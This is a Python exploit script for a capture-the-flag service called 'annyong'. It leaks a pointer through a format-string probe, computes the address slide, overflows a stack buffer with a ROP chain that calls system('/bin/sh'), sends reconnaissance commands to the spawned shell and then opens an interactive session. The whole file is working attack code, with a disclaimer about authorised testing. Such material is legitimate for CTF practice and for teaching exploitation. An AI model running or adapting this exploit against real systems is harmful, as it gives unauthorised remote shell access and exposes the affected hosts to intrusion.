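#!/usr/bin/env python
"""Exploit client for the "annyong" CTF service (annyong.shallweplayaga.me:5679).

Two stages over a single TCP connection:

1. A format-string probe (``%8$llx``) makes the service print its 8th
   positional argument as hex.  The distance between that live value and the
   one recorded with ASLR disabled (``LEAK_BASELINE``) is taken as the load
   slide of the target's libraries.
2. A stack buffer overflow: ``PAD_LEN`` filler bytes up to the saved return
   address, then a three-entry ROP chain (``pop rdi; ret`` -> ``"/bin/sh"``
   -> ``system``) built from libc addresses recorded on the same no-ASLR run,
   each shifted by the slide.

Once the chain has run, a few reconnaissance commands are sent to the spawned
shell and the socket is handed over to the user interactively.

The addresses and the padding length are specific to the target binary and
its libc build; they will not work anywhere else.  Only run this against
systems you are authorised to test.  The code is Python 2.7 and 3 compatible:
everything on the wire is ``bytes`` and the socket is never wrapped in
``makefile`` (the original ``makefile('rw', bufsize=0)`` call is Python 2 only).
"""
from struct import pack
import select
import socket
import sys

try:
    import telnetlib  # deprecated in Python 3.11, removed in 3.13
except ImportError:
    telnetlib = None

TARGET_HOST = "annyong.shallweplayaga.me"
TARGET_PORT = 5679

# libc addresses recorded against the target with ASLR disabled.  They are
# only meaningful for that exact libc build.
POP_RDI_RET = 0x7ffff7a8afd1  # pop rdi; ret
BIN_SH_ADDR = 0x7ffff7b949d1  # "/bin/sh" string inside libc
SYSTEM_ADDR = 0x7ffff7a60660  # system()

# Value the %8$llx probe returned on the same no-ASLR run.  (live leak -
# LEAK_BASELINE) is applied to every gadget.  NOTE(review): this value sits
# where ld.so's data usually lands with ASLR off, so the leak may be an ld.so
# pointer rather than a libc one; the slide is then only correct when both
# libraries move together (the usual case for adjacent mmap'd libraries) --
# confirm on the target before relying on it.
LEAK_BASELINE = 0x7ffff7ffd040

LEAK_PROBE = b"%8$llx\n"
PAD_LEN = 2072  # filler bytes before the saved return address (presumably buffer + saved rbp)
POST_SHELL_CMDS = b"echo pwn;id;uname -a;ls -la\n"


def recv_line(sock, max_len=4096):
    """Read one newline-terminated line from `sock`, one byte at a time.

    Byte-at-a-time reads are deliberate: nothing past the newline is consumed,
    so bytes that follow stay on the socket for the interactive session (a
    buffered reader would swallow them).  Stops at EOF or after `max_len`
    bytes.  Returns the line as bytes, including the newline when one was read.
    """
    chunks = []
    while len(chunks) < max_len:
        byte = sock.recv(1)
        if not byte:  # peer closed the connection
            break
        chunks.append(byte)
        if byte == b"\n":
            break
    return b"".join(chunks)


def parse_leak(line):
    """Parse the hex pointer the service echoes back for the format-string probe.

    `line` is the raw reply as bytes; surrounding whitespace is ignored and an
    optional ``0x`` prefix is accepted.  Returns the pointer as an int.
    Raises ValueError with a descriptive message when the reply is empty
    (connection closed before answering) or is not a hex number, so the script
    aborts instead of sending a chain built from garbage.
    """
    text = line.strip()
    if not text:
        raise ValueError("empty reply to the leak probe (connection closed?)")
    try:
        return int(text, 16)
    except ValueError:
        raise ValueError("leak reply is not a hex pointer: %r" % (text,))


def build_payload(leaked, pad_len=PAD_LEN):
    """Build the overflow payload for a given live leak value.

    `leaked` is the pointer returned by the probe; ``leaked - LEAK_BASELINE``
    is the slide added to each no-ASLR gadget address.  `pad_len` is the
    number of filler bytes before the return address.  Returns bytes: the
    filler followed by three little-endian QWORDs (pop rdi; ret, the address
    of "/bin/sh", system).  struct.error is raised, as in the original, if a
    shifted address leaves the unsigned 64-bit range.
    """
    slide = leaked - LEAK_BASELINE
    chain = (POP_RDI_RET, BIN_SH_ADDR, SYSTEM_ADDR)
    return b"A" * pad_len + b"".join(pack("<Q", gadget + slide) for gadget in chain)


def interact(sock):
    """Hand `sock` to the user: telnetlib when available, else a select loop.

    The fallback (POSIX only, needs a real stdin) exists because telnetlib is
    gone from the stdlib in Python 3.13.  Returns when either side closes.
    """
    if telnetlib is not None:
        session = telnetlib.Telnet()
        session.sock = sock
        session.interact()
        return
    while True:
        readable, _, _ = select.select([sock, sys.stdin], [], [])
        if sock in readable:
            data = sock.recv(4096)
            if not data:
                return
            sys.stdout.write(data.decode("latin-1"))
            sys.stdout.flush()
        if sys.stdin in readable:
            line = sys.stdin.readline()
            if not line:
                return
            sock.sendall(line.encode("latin-1"))


def main(argv=None):
    """Run the exploit end to end: leak, build the chain, overflow, interact.

    `argv` (default ``sys.argv[1:]``) may carry ``host [port]`` to override the
    original target.  The socket is closed on any exit path.
    """
    args = sys.argv[1:] if argv is None else argv
    host = args[0] if len(args) > 0 else TARGET_HOST
    port = int(args[1]) if len(args) > 1 else TARGET_PORT

    sock = socket.create_connection((host, port))
    try:
        # Stage 1: make the service leak a pointer and derive the slide from it.
        sock.sendall(LEAK_PROBE)
        leaked = parse_leak(recv_line(sock))
        # Stage 2: overflow the buffer; the newline terminates the input line.
        sock.sendall(build_payload(leaked) + b"\n")
        # Stage 3: commands for the spawned shell, then an interactive session.
        sock.sendall(POST_SHELL_CMDS)
        interact(sock)
    finally:
        sock.close()


if __name__ == "__main__":
    main()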